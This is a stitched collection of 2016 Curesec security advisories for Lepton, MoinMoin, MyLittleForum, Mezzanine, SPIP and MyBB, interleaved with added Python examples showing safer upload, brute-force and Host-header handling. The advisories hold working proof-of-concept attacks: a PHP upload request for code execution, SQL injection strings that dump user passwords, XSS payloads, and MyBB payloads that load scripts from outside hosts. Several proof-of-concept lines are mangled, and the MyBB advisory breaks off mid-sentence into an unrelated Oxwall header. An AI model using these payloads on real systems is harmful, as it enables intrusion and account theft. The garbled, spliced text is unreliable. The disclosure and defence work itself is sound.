Fixed in: 2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is vulnerable to code execution as it is possible to upload files with a dangerous type via the media manager.

3. Details

Upload of file with dangerous type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description:
When uploading a file in the media tab, there is a client-side as well as a server-side extension check. The server-side check can be bypassed by including a valid extension before the desired extension, leading to code execution or XSS.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken=099c871bbf640f2f91d2az1472132032 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: lep9131sessionid=8bgkd5rae5nhbn0jaac8jpkpc5
Connection: close
Content-Type: multipart/form-data; boundary=---38397165016927337851258279296
Content-Length: 613

-----38397165016927337851258279296
Content-Disposition: form-data; name="action"

media_upload
-----38397165016927337851258279296
Content-Disposition: form-data; name="current_dir"


-----38397165016927337851258279296
Content-Disposition: form-data; name="upload[]"; filename="test.png.php5"
Content-Type: image/png


http://localhost/LEPTON_stable_2.2.2/upload/media/test.png.php5?x=id

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-Code-Execution-171.html
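An added example, not the projects' code, contrasting the two extension checks that the Jaws and Lepton code execution advisories describe (a blocklist on the last extension, and acceptance once an allowed extension appears first) with a rule that takes a single allowed extension only. The blocklist and allowlist contents are assumptions modelled on the advisories.

```python
import os

# Modelled flaws, not the projects' actual code: the Jaws file manager checks
# whether the last extension is on a blocklist; Lepton's media manager accepts
# the name once the first extension is an allowed one (test.png.php5).
PHP_BLOCKLIST = {"php", "php3", "php4", "php5", "phtml", "htaccess"}
IMAGE_ALLOWLIST = {"png", "jpg", "jpeg", "gif"}


def _parts(filename):
    return os.path.basename(filename).lower().split(".")


def last_extension_not_blocked(filename):
    """Jaws-style blocklist: shell.pht slips through because .pht is not listed,
    even though (per the advisory) a default Apache install hands it to PHP."""
    parts = _parts(filename)
    return len(parts) > 1 and parts[-1] not in PHP_BLOCKLIST


def first_extension_is_image(filename):
    """Lepton-style check: test.png.php5 passes because 'png' comes first."""
    parts = _parts(filename)
    return len(parts) > 1 and parts[1] in IMAGE_ALLOWLIST


def single_image_extension(filename):
    """Hardened rule: exactly one extension, from the allowlist, and no dotfiles."""
    parts = _parts(filename)
    return len(parts) == 2 and parts[0] != "" and parts[1] in IMAGE_ALLOWLIST


def stored_name(filename, token):
    """What the uploader should write to disk: a server-chosen token plus the one
    validated extension, so the client-supplied name never reaches the filesystem."""
    if not single_image_extension(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    return f"{token}.{_parts(filename)[1]}"


def evaluate(filenames):
    """For each name: (blocklist verdict, first-extension verdict, hardened verdict)."""
    return {f: (last_extension_not_blocked(f), first_extension_is_image(f),
                single_image_extension(f)) for f in filenames}


if __name__ == "__main__":
    for name, v in evaluate(["photo.jpg", "shell.pht", "test.png.php5", ".htaccess"]).items():
        print(f"{name:16} blocklist={v[0]!s:5} first-ext={v[1]!s:5} hardened={v[2]}")
```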
[FD] Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability Type: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it contains various low to medium impact issues. The functionality that operates on files and folders is vulnerable to CSRF, which may lead to XSS; the logout is vulnerable to Open Redirect; the built-in bruteforce protection can be easily bypassed; and passwords are hashed with md5 and sent out via email in plaintext.

3. Details

CSRF

CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P

Description:
All actions on folders and files are missing CSRF protection. Because of this, an attacker can delete, create, or rename folders and files. An attacker could for example create .html files which would lead to an XSS attack.

Proof of Concept:

Delete Folder:
http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?action=delete_folder" method="POST">

Create File:
http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?action=create_file" method="POST">

Open Redirect

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description:
The redirect parameter of the logout script is vulnerable to open redirect.

Proof of Concept:
http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http://google.com

Insufficient Bruteforce Protection

Description:
The bruteforce protection works on a per-session basis, which is easily bypassed by an attacker by simply requesting a new session, i.e. by not sending the current, locked session information. The current bruteforce protection may provide a false sense of security and should thus be removed or changed.

Code:

    if($_SESSION['ATTEMPS'] > $this->max_attemps) {
        $this->warn();
    }

Password Handling

The password reset functionality sends a newly generated password in plaintext via email, which is not recommended. Additionally, md5 is used for hashing, which is also not recommended.

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-CSRF-Open-Redirect-Insecure-Bruteforce-Protection-amp-Password-Handling-172.html
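An added example, not Lepton's code, that models the per-session counter from the snippet above beside a per-account one and shows how many guesses a client that simply drops its session cookie gets through in each case. The class and function names, the limit of five attempts and the demo account are assumptions.

```python
from collections import defaultdict

MAX_ATTEMPTS = 5   # assumed limit, standing in for $this->max_attemps


class SessionKeyed:
    """Counter lives in the caller's session, as $_SESSION['ATTEMPS'] does:
    whoever controls the session cookie controls the counter."""

    def key(self, session_id, username):
        return ("session", session_id)


class AccountKeyed:
    """Counter keyed by the target account, which the client cannot reset by
    discarding its cookie (production would add per-IP limits and backoff)."""

    def key(self, session_id, username):
        return ("account", username)


class LoginService:
    def __init__(self, users, keying):
        self.users = users            # username -> password, plaintext for the demo only
        self.keying = keying
        self.attempts = defaultdict(int)
        self._sessions = 0

    def login(self, session_id, username, password):
        """Returns (outcome, session_id); outcome is 'ok', 'bad_password' or 'locked'."""
        if session_id is None:        # no cookie sent: the server starts a fresh session
            self._sessions += 1
            session_id = f"sess-{self._sessions}"
        key = self.keying.key(session_id, username)
        if self.attempts[key] >= MAX_ATTEMPTS:
            return "locked", session_id
        if self.users.get(username) == password:
            self.attempts.pop(key, None)
            return "ok", session_id
        self.attempts[key] += 1
        return "bad_password", session_id


def guess(service, username, candidates, drop_cookie_each_time):
    """Submit candidates in order. With drop_cookie_each_time the client omits its
    session cookie on every request, which is the bypass the advisory describes.
    Returns (number of passwords the server actually checked, login succeeded)."""
    sid, checked = None, 0
    for pw in candidates:
        outcome, sid = service.login(None if drop_cookie_each_time else sid, username, pw)
        if outcome == "locked":
            break
        checked += 1
        if outcome == "ok":
            return checked, True
    return checked, False


CANDIDATES = [f"guess{i}" for i in range(19)] + ["correct horse battery"]   # constructed list


def run_demo():
    users = {"admin": "correct horse battery"}   # constructed demo account
    return {
        "session_keyed_keep_cookie": guess(LoginService(users, SessionKeyed()), "admin", CANDIDATES, False),
        "session_keyed_drop_cookie": guess(LoginService(users, SessionKeyed()), "admin", CANDIDATES, True),
        "account_keyed_drop_cookie": guess(LoginService(users, AccountKeyed()), "admin", CANDIDATES, True),
    }


if __name__ == "__main__":
    for scenario, (checked, success) in run_demo().items():
        print(f"{scenario:28} checked={checked:2}  success={success}")
```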
[FD] Lepton 2.2.2: SQL Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is vulnerable to multiple SQL injections. The injections require a user account with elevated privileges.

3. Details

SQL Injection: Search Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description:
The "terms" parameter of the page search is vulnerable to SQL Injection. A user account with the right "Pages" is required to access this feature.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken=3f7020b05ec343675b6b2z1472137594 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

search_scope=title&terms=" union select username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from lep_users -- -&search=Search

Blind or Error-based SQL Injection: Create Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description:
The "parent" parameter of the create page functionality is vulnerable to SQL Injection. A user account with the right "Pages" is required to access this feature. The injection is blind, or error based in the case that PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken=dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

title=test&type=wysiwyg&parent=0 union select version()&visibility=public&submit=Add

Blind or Error-based SQL Injection: Add Droplet

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description:
The "Add_droplets" parameter of the droplet permission manager is vulnerable to SQL injection. A user account with access to the Droplets administration tool is required. The injection is blind, or error based in the case that PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets&leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 277

tool=droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute='Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1&Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1&Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html
[FD] MoinMoin 1.9.8: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MoinMoin 1.9.8
Fixed in:            1.9.9
Fixed Version Link:  http://static.moinmo.in/files/moin-1.9.9.tar.gz
Vendor Website:      https://moinmo.in
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 CVE-2016-7148, CVE-2016-7146

Credits: Tim Coen of Curesec GmbH

2. Overview

MoinMoin is an open source Wiki application written in Python. In version 1.9.8, it is vulnerable to two persistent XSS issues. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS (CVE-2016-7148)

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description:

A page name is echoed in the attach file page without encoding, leading to persistent XSS.

Proof of Concept:

To place the payload, create a new page which contains the payload as its name by visiting:

    http://localhost:9090/newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=edit

To trigger the payload, visit the attach file page:

    http://localhost:9090/newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=AttachFile

Note that there must be at least one existing attachment.

XSS 2: Persistent XSS (CVE-2016-7146)

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description:

The GUI editor is vulnerable to XSS via a specifically crafted URL, as it echoes part of the URL without encoding in two different places. The issue can be exploited reflected or persistent.

Proof of Concept:

Reflected example (the page does not have to exist):

    http://localhost:9090/'"> ?action=fckdialog&dialog=attachment

Alternatively, an attacker can create a page containing the payload:

    http://localhost:9090/newtestfoo'%22%3E%3Cimg%20src=no%20onerror=alert(1)%3E

The payload is triggered when attaching a file via the GUI editor ("Edit (GUI)" -> "Attachment").

4. Solution

To mitigate this issue please upgrade at least to version 1.9.9:
http://static.moinmo.in/files/moin-1.9.9.tar.gz

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVEs
09/06/2016 CVEs assigned and distributed to vendor
10/05/2016 Vendor requests more time
10/31/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/MoinMoin-198-XSS-175.html
[FD] MyLittleForum 2.3.6.1: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyLittleForum 2.3.6.1
Fixed in:            2.3.7beta
Fixed Version Link:  https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta
Vendor Website:      http://mylittleforum.net/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a

Credits: Tim Coen of Curesec GmbH

2. Overview

MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is vulnerable to cross site request forgery. An attacker could exploit this issue to add new users or change the status of existing users to administrator if a victim visits a website containing a specifically crafted payload while logged into MyLittleForum.

3. Details

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description:

There is no CSRF protection, allowing an attacker to perform actions for a victim if the victim visits an attacker controlled website while logged in.

Proof of Concept:

Add New User:

    http://localhost/mylittleforum-2.3.6.1/index.php" method="POST">

Make Existing User Admin:

4. Solution

To mitigate this issue please upgrade at least to version 2.3.7beta:
https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta

Please note that a newer version might already be available.

5. Report Timeline

09/05/2015 Informed Vendor about Issue (no reply)
09/15/2015 Reminded Vendor of Disclosure Date
09/15/2015 Vendor replies
10/04/2015 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/MyLittleForum-2361-CSRF-176.html
[FD] Mezzanine 4.2.0: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Mezzanine 4.2.0
Fixed in:            4.2.1
Fixed Version Link:  https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1
Vendor Website:      http://mezzanine.jupo.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a

Credits: Tim Coen of Curesec GmbH

2. Overview

Mezzanine is an open source CMS written in Python. In version 4.2.0, it is vulnerable to two persistent XSS attacks, one of which requires extended privileges while the other does not. These issues allow an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS via Name in Comments

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description:

When leaving a comment on a blog post, the author name is echoed unencoded in the backend, leading to persistent XSS.

Proof of Concept:

Leave a comment, as author name use '">

To trigger the payload, view the comment overview in the admin backend:

    http://localhost:8000/admin/generic/threadedcomment

XSS 2: Persistent XSS via HTML file upload

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

Description:

When uploading files via the media manager, the extension .html is allowed, leading to XSS via file upload. An account with the permissions to upload files to the media manager is required.

Proof of Concept:

Visit the media manager and upload a .html file:

    http://localhost:8000/admin/media-library/upload/?ot=desc&o=date

As uploaded files are stored inside the web root, the file can now be accessed, thus executing the JavaScript code it contains:

    http://localhost:8000/static/media/uploads/xss.html

4. Solution

To mitigate this issue please upgrade at least to version 4.2.1:
https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/05/2016 Vendor replies
09/19/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html
[FD] SPIP 3.1: XSS & Host Header Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    SPIP 3.1
Fixed in:            3.1.2 / 3.0.23
Fixed Version Link:  http://www.spip.net/en_download
Vendor Website:      http://www.spip.net/
Vulnerability Type:  Reflected & Persistent XSS, Host Header Injection, httpOnly Cookie disclosure
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a

Credits: Tim Coen of Curesec GmbH

2. Overview

SPIP is a content management system written in PHP. In version 3.1, it is vulnerable to a persistent as well as a reflected cross site scripting vulnerability, as it allows users to enter URLs containing the JavaScript protocol, which an attacker can exploit to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. Additionally, it contains a Host Header Injection which may lead to the leakage of password reset tokens and thus the compromise of user accounts. Finally, the application discloses httpOnly cookies, making exploitation of XSS issues slightly easier.

3. Details

Persistent XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description:

When posting a message in the internal Forum, user input is properly encoded, thus disallowing XSS. However, a hypertext link may be added as well, and there is no check on the protocol of the supplied link, which leads to an XSS vulnerability.

Proof of Concept:

1. Create a new Message: http://localhost/spip/ecrire/?exec=forum&repondre=new
2. In the URL field enter: javascript:alert(1)
3. Post the Message

To trigger the payload, a click on the link is required.

Reflected XSS

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description:

When editing a private message, a redirect parameter may be submitted as well. This parameter decides which page a user is returned to when pressing the back button. The value of this parameter is user controlled and may thus be used for phishing or XSS attacks.

Proof of Concept:

Visit:

    http://localhost/spip/ecrire/?exec=message_edit&new=oui&to=2&redirect=javascript:alert(1)

Click on the Back button represented by the envelope icon.

Host Header Injection

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:P/I:N/A:N

Description:

The application takes the Host header and uses it in a password reset email. As the Host header is user-controlled, an attacker can set it to arbitrary values. In the case of a password reset page, this can lead to security issues, as an attacker can request a password reset email for a user and set the Host header to a server they control. As this header is used in the email, a user would be sent to the attacker's server if they were to click on the link, leading to the leakage of the recovery token and thus the compromise of the account.

Proof of Concept:

Request:

    POST /spip/spip.php?page=spip_pass&lang=en HTTP/1.1
    Host: example.com
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: spip_accepte_ajax=1; spip_admin=%40admin; PHPSESSID=1l8rvbhcgia45ddj7ldoc1gpf6; wb-installer=3d2hes1b6i0bfb586iucm76sp2; wb-4174-sid=u571gr7isplq8b4f01fniqevk2
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 199

    page=spip_pass&lang=en&formulaire_action=oubli&formulaire_action_args=orESpF0vSC3Q%2BB30uGEFqT7k6AcDObDMasMNzVp3EjndtlvZ%2B5k4g%2FkyF%2BAlzhBhCI%2F%2F9hx%2FZ33mkQPk&oubli=visitor%40example.com&nobot=

Email sent:

    [My SPIP site] Forgotten password
    (this is an automated message)

    To recover your access to the site
    My SPIP site (http://localhost/spip)

    Please go to the following address:
    http://example.com/spip/spip.php?page=spip_pass&p=107017475657c15ad6e9c781.23674073

    You can then enter a new password and log in to the site.

httpOnly Cookie Disclosure

Description:

The phpinfo page discloses httpOnly cookies such as session cookies, making it slightly easier to exploit XSS vulnerabilities.

Proof of Concept:

    http://localhost/spip/ecrire/?exec=info

4. Solution

To mitigate this issue please upgrade at least to version 3.1.2:
http://www.spip.net/en_download

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/23/2016 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/SPIP-31-XSS-amp-Host-Header-Injection-178.html
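The Host Header Injection above exists because the reset link is assembled from a header the requester controls. The following Python example, added here and not part of the advisory or of SPIP, shows that construction beside one that takes the link from a configured base URL and refuses requests whose Host header is not on an allowlist; SITE_CONFIG, the function names and the captured request are constructed for the example.

```python
"""Password-reset links built from the Host header vs. from configuration.

Added illustration, not SPIP code. SITE_CONFIG, the function names and the
captured request are constructed for this example.
"""


class UntrustedHostError(ValueError):
    """The request's Host header is not one of the hostnames this site serves."""


# Constructed deployment configuration: the public base URL is fixed once by
# the operator instead of being derived from each request.
SITE_CONFIG = {
    "base_url": "http://localhost/spip",
    "allowed_hosts": {"localhost", "www.example.org"},
}

# Constructed request, modelled on the advisory's PoC: the reset is requested
# for a victim's address while Host points at a server the attacker controls.
ATTACKER_REQUEST_HEADERS = {
    "Host": "example.com",
    "Content-Type": "application/x-www-form-urlencoded",
}


def host_from_headers(headers: dict) -> str:
    """Return the Host header lower-cased and without a port suffix."""
    raw = headers.get("Host", "").strip().lower()
    # Bracketed IPv6 literals are not handled here; the sites in the advisory
    # are served under hostnames.
    return raw.split(":", 1)[0]


def is_allowed_host(headers: dict, allowed_hosts: set) -> bool:
    """True when the Host header names one of the configured hostnames."""
    host = host_from_headers(headers)
    return bool(host) and host in allowed_hosts


def reset_link_from_host(headers: dict, token: str) -> str:
    """Vulnerable pattern: the link is assembled from the Host header, so the
    token travels to whatever host the requester chose (the advisory's email
    shows exactly this)."""
    return f"http://{headers['Host']}/spip/spip.php?page=spip_pass&p={token}"


def reset_link_from_config(config: dict, headers: dict, token: str) -> str:
    """Safe pattern: the link comes from the configured base URL. The Host
    header is still checked so that requests for unexpected hostnames are
    refused (and can be logged), but its value never reaches the link."""
    if not is_allowed_host(headers, config["allowed_hosts"]):
        raise UntrustedHostError(f"unexpected Host header {headers.get('Host')!r}")
    base = config["base_url"].rstrip("/")
    return f"{base}/spip.php?page=spip_pass&p={token}"


if __name__ == "__main__":
    token = "TOKEN_PLACEHOLDER"  # a real token would come from the reset flow
    print("vulnerable:", reset_link_from_host(ATTACKER_REQUEST_HEADERS, token))
    try:
        reset_link_from_config(SITE_CONFIG, ATTACKER_REQUEST_HEADERS, token)
    except UntrustedHostError as err:
        print("rejected:", err)
    print("safe:", reset_link_from_config(SITE_CONFIG, {"Host": "localhost:8080"}, token))
```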
[FD] MyLittleForum 2.3.6.1: XSS & RPO
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyLittleForum 2.3.6.1
Fixed in:            2.3.7beta
Fixed Version Link:  https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta
Vendor Website:      http://mylittleforum.net/
Vulnerability Type:  XSS & RPO
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a

Credits: Tim Coen of Curesec GmbH

2. Overview

MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is vulnerable to reflected cross site scripting as well as relative path overwrite. XSS can be used to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection, and RPO may lead to CSS injection.

3. Details

Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description:

The username and email parameters of the add user page are vulnerable to reflected XSS.

Proof of Concept:

    http://localhost/mylittleforum-2.3.6.1/index.php"; method="POST"> alert(1)" />

Relative Path Overwrite

Description:

Because the application includes CSS files via relative instead of absolute paths, an attacker can overwrite the path. With some browsers, this may lead to CSS injection.

Proof of Concept:

    http://localhost/mylittleforum-2.3.6.1/index.php?id=1

4. Solution

To mitigate this issue please upgrade at least to version 2.3.7beta:
https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta

Please note that a newer version might already be available.

5. Report Timeline

09/05/2015 Informed Vendor about Issue (no reply)
09/15/2015 Reminded Vendor of Disclosure Date
09/15/2015 Vendor replies
10/04/2015 Vendor releases fix
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/MyLittleForum-2361-XSS-amp-RPO-179.html
[FD] MyBB 1.8.6: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyBB 1.8.6
Fixed in:            1.8.7
Fixed Version Link:  http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website:      http://www.mybb.com/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a

Credits: Tim Coen of Curesec GmbH

2. Overview

MyBB is forum software written in PHP. In version 1.8.6, it contains various XSS vulnerabilities, some of which are reflected and some of which are persistent. Some of them depend on custom forum or server settings. These issues may lead to the injection of JavaScript keyloggers, injection of content such as ads, or the bypassing of CSRF protection, which would for example allow the creation of a new admin user.

3. Details

XSS 1: Persistent XSS - Signature

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description:

The profile editor of the moderator control panel does not properly encode the signature of a user when editing it. Because of this, a user can create a specifically crafted signature and - once a moderator or admin visits the profile editor for that user - the injected code will be executed in the context of the victim's browser.

Proof of Concept:

Visit the profile at:

    http://localhost/mybb_1806/Upload/modcp.php?action=editprofile&uid=[USER_ID]

As signature, use:

XSS 2: Persistent XSS - Forum Post (depending on forum settings)

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description:

An admin can allow HTML input for specific forums via the setting allowhtml. There are various filters in place which intend to make this safe, which may leave the admin with the impression that it is indeed safe. However, there are various possibilities to bypass these filters, mainly using HTML5 features.

Proof of Concept:

    -> Visiting the post will trigger the code

    context menu
    -> A right-click will trigger the code

    Enter something:
    -> Input into the field will trigger the code

    -> A click on submit will trigger the code

There are various other attributes which may also work, such as onsearch, onkeydown, onkeyup, ondrag, onscroll, oncopy, and so on. Other attributes such as onMouseOver or onFocus are filtered out.

XSS 3: Persistent XSS - Username (depending on forum settings)

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description:

The username is echoed unencoded in the user area. As the login does not have CSRF protection, and as an admin can be logged into the admin area with a different account than the one they are logged into the forum with, a persistent XSS vulnerability in the user area can be exploited. However, successful exploitation most likely requires a username length of at least 43 characters, which is more than the default settings allow.

Simple Proof of Concept:

1. register user with name f" onmouseover="alert(1)" b="
2. login and visit http://localhost/mybb_1805/Upload/usercp.php
3. hover over the avatar

The simple proof of concept can be improved to allow successful exploitation. It is not required for the victim to hover over the avatar or interact with the webpage in any way:

1. As username, use: f" onerror="alert(1)" b="
2. Set an avatar, and use a URL as source (not an image upload)
3. Delete the image from the remote host, making it unavailable, thus triggering an error and executing the injected code.

Possible Payloads:

Loading a script with vanilla JavaScript takes a lot more characters than are allowed in a username by default:

    "onerror="s=document.createElement('script');s.src='http://localhost/s.js'; document.getElementById('top').appendChild(s)"

As jQuery is loaded, this can be optimized:

    "onerror="$.getScript('http://aa.bc/s.js')

Executing the payload for a victim:

The attack does not require the victim to be logged out, as one can log in even when already logged in. Logging in as a normal user also does not affect the login as admin. Thus, an attacker could use the following payload to log a victim in and redirect them to the site containing the payload:

    http://localhost/mybb_1805/Upload/member.php" target="myframe" id="myform" name="myform">http://localhost/s.js')" />document.myform.submit();

It will automatically log the victim in and redirect them to the page that triggers the script execution. No action of the victim is required.

The loaded script could for example perform a backup of the database and then send the attacker the name of the backup, as backups are stored in a public directory.

XSS 4: Persistent XSS - Post Attachment (depending on server settings)

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description:

Attachments are uploaded to a public directory, and their extension is changed to .attach. Files with extension .attach that contain HTML code are interpreted as HTML files by some default server configurations (for example Apache). Additionally, t
[FD] Oxwall 1.8.0: XSS & Open Redirect
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Oxwall 1.8.0 (build 9900)
Fixed in:            1.8.2
Fixed Version Link:  https://developers.oxwall.com/download
Vendor Website:      http://www.oxwall.org/
Vulnerability Type:  XSS & Open Redirect
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 09/15/2016
Release mode:        Coordinated Release
CVE:                 n/a

Credits: Tim Coen of Curesec GmbH

2. Overview

